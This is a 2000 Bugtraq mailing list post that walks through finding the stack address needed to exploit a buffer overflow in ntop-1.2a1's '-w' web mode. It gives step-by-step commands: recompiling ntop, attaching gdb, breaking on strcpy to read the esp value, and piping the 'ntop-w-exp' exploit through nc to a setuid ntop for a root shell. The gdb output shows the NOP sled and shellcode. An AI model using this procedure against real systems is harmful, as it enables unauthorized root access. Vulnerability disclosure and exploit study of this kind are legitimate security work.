[17367] in bugtraq
How to find ntop -w esp value.
daemon@ATHENA.MIT.EDU (JW Oh)
Thu Oct 26 16:11:40 2000
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=EUC-KR
Content-Transfer-Encoding: 8BIT
Message-ID: <Pine.LNX.4.10.10010261331440.27783-100000@ivntech.com>
Date: Thu, 26 Oct 2000 13:32:41 +0900
Reply-To: mat@IVNTECH.COM
From: JW Oh <mat@IVNTECH.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
1. [on victim host] First modify ntop-1.2a1 src code to execute it with non-root priviledge. and compile it.
ntop.c:362
if((0 && (rFileName == NULL) && (getuid () && geteuid ()) || setuid (0)) ){
2. [on local host] do "tcpdump -w somefile" to get tcpdump file to feed ntop. copy it to victim host.
3. [on victim host] execute following with our modified ntop
$ ./ntop -w 8080 -f somefile
Warning: unable to read file '.ntop'. No security will be used!
Waiting for HTTP connections on port 8080...
4. [on victim host] run gdb to attach our ntop process. and break at function returnHTTPPage.
$ gdb ./ntop 2634
(gdb) break returnHTTPPage
Breakpoint 1 at 0x8051350
(gdb) cont
Continuing.
[Switching to Thread 28851]
5. [on local host] execute exploit to victim host
$ ./ntop-w-exp | nc victim 8080
5. [on victim host] gdb will stop at breakpoint returnHTTPPage. then you set break point on function strcpy, and then continue, then gdb will stop at strcpy breakpoint. The value of "dest=0xbefffb00" is the location of stack we will use as esp value.
Breakpoint 1, 0x8051350 in returnHTTPPage ()
(gdb) break strcpy
Breakpoint 2 at 0x400c842a: file ../sysdeps/generic/strcpy.c, line 33.
(gdb) cont
Continuing.
Breakpoint 2, strcpy (dest=0xbefffb00 "$ý¡¾±\017\005\b\b",
src=0x8091dc1 '\220' <repeats 50 times>, "êÌ037^\211v\b1¿º210F\a\211F\fs.013\211òÌ215N\b\215V\fÌÌ2001ÚÌ211ÙÐÌÌ200èÜmes>bin/sh\030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030"...) at ../sysdeps/generic/strcpy.c:33
(gdb) cont
Continuing.
6. [on victim host] Now kill our ntop and run suid ntop.
$ /usr/local/sbin/ntop -w 8080
7. [on local host] modify esp value in ntop-w-exp.c and execute exploit. you can set offset with first argument to ntop-w-exp. I think offset must be minus value.
$ ./ntop-w-exp | nc victim 8080
8. [on victim host] You will get root shell.
=================================================
| |
| mat@hacksware.com |
| |
=================================================
